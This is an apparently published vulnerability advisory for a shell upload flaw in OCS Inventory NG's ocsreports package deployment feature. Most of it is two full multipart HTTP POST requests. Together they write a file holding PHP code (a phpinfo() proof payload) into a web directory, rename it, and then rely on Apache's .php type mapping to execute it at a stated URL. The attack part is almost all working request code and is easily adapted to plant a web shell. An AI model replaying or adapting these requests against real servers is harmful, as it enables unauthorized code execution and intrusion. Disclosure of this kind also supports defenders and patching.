OCS Inventory NG ocsreports Shell Upload Vulnerability

2018-11-14
ID: 100242
CVE: None
Download vulnerable application: None
OCS Inventory NG ocsreports Shell Upload
 ## Request 1
 This request creates a temporary file containing PHP code in the /usr/share/ocsinventory-reports/ocsreports/a.php.a/ directory.
     POST /ocsreports/index.php?function=tele_package HTTP/1.1
    Host: 192.168.5.135
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package
    Content-Type: multipart/form-data; boundary=---------------------------491299511942
    Content-Length: 2836
    Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0
    Connection: close
    Upgrade-Insecure-Requests: 1
     -----------------------------491299511942
    Content-Disposition: form-data; name="CSRF_10"
     8ab3df2f9a2078530027e74191af0b087429ad41
    -----------------------------491299511942
    Content-Disposition: form-data; name="document_root"
     /usr/share/ocsinventory-reports/ocsreports/
    -----------------------------491299511942
    Content-Disposition: form-data; name="timestamp"
     a.php.a
    -----------------------------491299511942
    Content-Disposition: form-data; name="NAME"
     dshasdgasga
    -----------------------------491299511942
    Content-Disposition: form-data; name="DESCRIPTION"
     asdgasdga
    -----------------------------491299511942
    Content-Disposition: form-data; name="OS"
     WINDOWS
    -----------------------------491299511942
    Content-Disposition: form-data; name="PROTOCOLE"
     HTTP
    -----------------------------491299511942
    Content-Disposition: form-data; name="PRIORITY"
     5
    -----------------------------491299511942
    Content-Disposition: form-data; name="teledeploy_file"; filename="exploit.zip"
    Content-Type: application/x-zip-compressed
     <?php
     phpinfo();
     ?>
    -----------------------------491299511942
    Content-Disposition: form-data; name="ACTION"
     EXECUTE
    -----------------------------491299511942
    Content-Disposition: form-data; name="ACTION_INPUT"
     asdgasdgasdg
    -----------------------------491299511942
    Content-Disposition: form-data; name="REDISTRIB_USE"
     0
    -----------------------------491299511942
    Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"
     d:\tele_ocs
    -----------------------------491299511942
    Content-Disposition: form-data; name="REDISTRIB_PRIORITY"
     5
    -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_USER"
     0
    -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_TEXT"
     -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"
     -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"
     0
    -----------------------------491299511942
    Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"
     0
    -----------------------------491299511942
    Content-Disposition: form-data; name="NEED_DONE_ACTION"
     0
    -----------------------------491299511942
    Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"
     -----------------------------491299511942
    Content-Disposition: form-data; name="valid"
     Send
    -----------------------------491299511942
    Content-Disposition: form-data; name="digest_algo"
     MD5
    -----------------------------491299511942
    Content-Disposition: form-data; name="digest_encod"
     Hexa
    -----------------------------491299511942
    Content-Disposition: form-data; name="download_rep_creat"
     /var/www/html/download/server/
    -----------------------------491299511942--
 ## Request 2
     This request renames the file to a.php.a-1 and also creates info file.
     POST /ocsreports/index.php?function=tele_package HTTP/1.1
    Host: 192.168.5.135
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package
    Content-Type: multipart/form-data; boundary=---------------------------4827543632391
    Content-Length: 3345
    Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0
    Connection: close
    Upgrade-Insecure-Requests: 1
     -----------------------------4827543632391
    Content-Disposition: form-data; name="CSRF_13"
     53b6eab749060aa8cbe972e9c9a31ae148cf886b
    -----------------------------4827543632391
    Content-Disposition: form-data; name="tailleFrag"
     0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="nbfrags"
     1
    -----------------------------4827543632391
    Content-Disposition: form-data; name="comment"
     asdgasdga
    -----------------------------4827543632391
    Content-Disposition: form-data; name="digest"
     b14f8d3b56fb10f2257f53ab32947a50
    -----------------------------4827543632391
    Content-Disposition: form-data; name="VALID_END"
     END
    -----------------------------4827543632391
    Content-Disposition: form-data; name="SIZE"
     347
    -----------------------------4827543632391
    Content-Disposition: form-data; name="document_root"
     /usr/share/ocsinventory-reports/ocsreports/
    -----------------------------4827543632391
    Content-Disposition: form-data; name="timestamp"
     a.php.a
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NAME"
     dshasdgasga
    -----------------------------4827543632391
    Content-Disposition: form-data; name="DESCRIPTION"
     -----------------------------4827543632391
    Content-Disposition: form-data; name="OS"
     WINDOWS
    -----------------------------4827543632391
    Content-Disposition: form-data; name="PROTOCOLE"
     HTTP
    -----------------------------4827543632391
    Content-Disposition: form-data; name="PRIORITY"
     5
    -----------------------------4827543632391
    Content-Disposition: form-data; name="teledeploy_file"; filename=""
    Content-Type: application/octet-stream
     -----------------------------4827543632391
    Content-Disposition: form-data; name="ACTION"
     EXECUTE
    -----------------------------4827543632391
    Content-Disposition: form-data; name="ACTION_INPUT"
     asdgasdgasdg
    -----------------------------4827543632391
    Content-Disposition: form-data; name="REDISTRIB_USE"
     0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"
     d:\tele_ocs
    -----------------------------4827543632391
    Content-Disposition: form-data; name="REDISTRIB_PRIORITY"
     5
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_USER"
     0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_TEXT"
     -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"
     -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"
     0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"
     0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NEED_DONE_ACTION"
     0
    -----------------------------4827543632391
    Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"
     -----------------------------4827543632391
    Content-Disposition: form-data; name="digest_algo"
     MD5
    -----------------------------4827543632391
    Content-Disposition: form-data; name="digest_encod"
     Hexa
    -----------------------------4827543632391
    Content-Disposition: form-data; name="download_rep_creat"
     /var/www/html/download/server/
    -----------------------------4827543632391--
 # Apache Config
 The application has the following line in the /etc/apache2/conf-available/ocsinventory-reports.conf config file:
     AddType application/x-httpd-php .php
 Thus any file containing .php substring might be executed by an attacker. Thus the uploaded file is accessible via http://192.168.5.135/ocsreports/a.php.a/a.php.a-1
Reference: https://httpd.apache.org/docs/2.4/mod/mod_mime.html#multipleext
 Regards,
Simon Uvarov
1-4-2 (www01)